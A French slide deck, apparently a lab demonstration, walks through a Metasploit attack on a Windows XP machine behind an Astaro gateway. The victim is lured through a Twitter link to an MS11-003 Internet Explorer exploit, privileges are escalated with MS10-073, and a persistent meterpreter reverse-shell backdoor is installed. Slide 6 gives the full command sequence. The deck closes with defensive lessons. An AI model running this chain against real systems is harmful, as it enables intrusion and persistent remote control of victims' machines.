Scénarios Metasploit                                                     Scénario 3Http://labs.zataz.com - Http://twitter....
Scénario 3 : Topologie                              Target                                                     Attacker   ...
Scénario 3 : Règles Firewall/Proxy   • Sur Astaro Security Gateway :      • Le réseau interne ne peut surfer sur Internet ...
Scénario 3 : Story-BoardCette topologie réseau correspond à certaines configurations ADSL d’internautes et aussi à la config...
Scénario 3 : Story-BoardL’attaquant envoi un message Twitter à la cible. Le message contient un lien malveillant dirigeant...
Scénario 3 : Commandesuse exploit/windows/browser/ms11_003_ie_css_importset SRVHOST 192.168.178.21set SRVPORT 443set SSL t...
Scénario 3 : Leçons apprises• Mettre à jour son OS et ses applicatifs !• Ne jamais cliquer sur des liens, surtout raccourc...
Prochain SlideShare
Chargement dans…5
×

Scénarios d'exploitation Metasploit - FR : Scénario 3

2 297 vues

Publié le

Publié dans : Technologie
0 commentaire
0 j’aime
Statistiques
Remarques
  • Soyez le premier à commenter

  • Soyez le premier à aimer ceci

Aucun téléchargement
Vues
Nombre de vues
2 297
Sur SlideShare
0
Issues des intégrations
0
Intégrations
185
Actions
Partages
0
Téléchargements
34
Commentaires
0
J’aime
0
Intégrations 0
Aucune incorporation

Aucune remarque pour cette diapositive
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Scénarios d'exploitation Metasploit - FR : Scénario 3

    1. 1. Scénarios Metasploit Scénario 3Http://labs.zataz.com - Http://twitter.com/eromang
    2. 2. Scénario 3 : Topologie Target Attacker 192.168.111.0/24 Astaro Gateway 192.168.178.0/24 Firewall Gateway Astaro Security Gateway 8.102 Proxy HTTP/S Transparent Anti-virus : Avira eth0 : 192.168.111.250 (interface interne) eth1 : 192.168.178.250 (interface externe) Target (cible) Attacker (attaquant) Windows XP SP3 IP : 192.168.178.21 Utilisateur « test » avec privilèges limités Metasploit IP : 192.168.111.129 - Passerelle par défaut : 192.168.111.250 Anti-virus : Dr.Web Security Space Firewall : Windows Firewall Vulnérabilités : Vulnérable à MS11-003 & MS10-073
    3. 3. Scénario 3 : Règles Firewall/Proxy • Sur Astaro Security Gateway : • Le réseau interne ne peut surfer sur Internet qu’en traversant le proxy HTTP/S transparent. • Le réseau interne peut surfer sur n’importe quel site Internet, par le groupe «Web Surfing». • Le groupe « Web Surfing » contient les autorisations suivantes : • HTTP (80/TCP), HTTP Proxy (8080/TCP), HTTP Webcache (3128/TCP), HTTPS (443) • Deux anti-virus scan en temps réel le traffic Internet (Avira & ClamAV) • Sur la cible : • Dr.Web anti-virus est installé, mais pas Dr.Web Firewall car pas proposé par défaut. • Le Firewall local Windows est activé et configuré par défaut.
    4. 4. Scénario 3 : Story-BoardCette topologie réseau correspond à certaines configurations ADSL d’internautes et aussi à la configuration de quelquespetites et moyennes entreprises.The réseau cible à 5 contre-mesures : • Une passerelle Firewall qui ne permet de surfer sur Internet que par le biais du groupe « Web Surf ». • Un proxy transparent HTTP/S situé sur la passerelle Firewall. • Deux antivirus, situé sur la passerelle Firewall, scannant en temps réel le surf sur Internet (Avira & ClamAV). • Un anti-virus Dr.Web Security Space sur l’ordinateur cible, avec une configuration par défaut. • Le Firewall local Windows activé sur l’ordinateur cible, avec une configuration par défaut.Il existe des bugs ouverts (ID16438 - ID16255), pour les certificats «self-signed», sur ASG8, datant du 11-02-2011. Certainsites web banquaire ne sont plus disponibles et les exceptions dans « Certificat Trust Check » ne fonctionne plus avec leproxy en mode transparent. Comme contre-mesure Astaro recommande de désactiver le scan anti-viral HTTPS (SLL) !http://www.astaro.com/lists/Known_Issues-ASG-V8.txtNous allons utiliser ces bugs connus en tant que vecteur d’attaque, car tous les ASG 8.100 et supérieur sont affectés. Laversion 8.100 est disponible depuis le 20-01-2011. La version 8.103 corrigera les bugs.La cible est vulnérable à la vulnérabilité Internet Explorer MS11-003 et à la vulnérabilité MS10-073 Keyboard Layout. • MS11-003 sera notre point d’entrée. • MS10-073 sera notre vecteur d’escalade de privilèges (Stuxnet).
    5. 5. Scénario 3 : Story-BoardL’attaquant envoi un message Twitter à la cible. Le message contient un lien malveillant dirigeant vers un site webpermettant d’exploiter la vulnérabilité MS11-003.Un message d’alerte Internet Explorer sera affiché à propos du certificat HTTPS, sur la démonstration nous n’avons pasde CA valide.La victime clique sur le lien fournis et la vulnérabilité MS11-003 est exploitée. Après exploitation un «payload»meterpreter reverse_tcp est initié vers l’attaque sur le port 8080/TCP.L’attaquant doit vérifier si les patchs suivant sont installés, afin de pouvoir lancer l’attaque du type « escalade deprivilèges» MS10-073 :• MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957)Si un de ces patchs est installé, l’escalade de privilèges par le biais de MS10-073 sera impossible. winenum est lasolution pour récupérer la liste des patchs installés.L’attaquant va exécuter l’escalade de privilèges MS10-073.L’attaquant va installer une «backdoor» meterpreter reverse_tcp persistente en tant que service sur la cible.
    6. 6. Scénario 3 : Commandesuse exploit/windows/browser/ms11_003_ie_css_importset SRVHOST 192.168.178.21set SRVPORT 443set SSL trueset URIPATH /readme.htmlset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.178.21set LPORT 8080exploitmigrate X -> vers un autre processuskill X -> 2 fois -> notepad.exe & et le processus iexplorer.exegetuidgetprivsgetsystemsysinfoipconfigroutebackgrounduse post/windows/escalate/ms10_073_kbdlayoutset SESSION 1runsessions -i 1getuidmigrate X -> vers un processus «NT AUTHORITYSYSTEM»run persistence -U -i 5 -p 8080 -r 192.168.178.21
    7. 7. Scénario 3 : Leçons apprises• Mettre à jour son OS et ses applicatifs !• Ne jamais cliquer sur des liens, surtout raccourcis, provenant de sources inconnues !• Toujours analyser le traffic sortant HTTPS avec un anti-virus.• Ne pas faire confiance à son anti-virus !• Sélectionner un anti-virus qui est capable de détecter des attaques basiques !• Ne pas faire confiance à ses Firewalls (Locaux ou distants) !• Suivre les bugs connus et les « Release Notes » de vos applicatifs. 7

    ×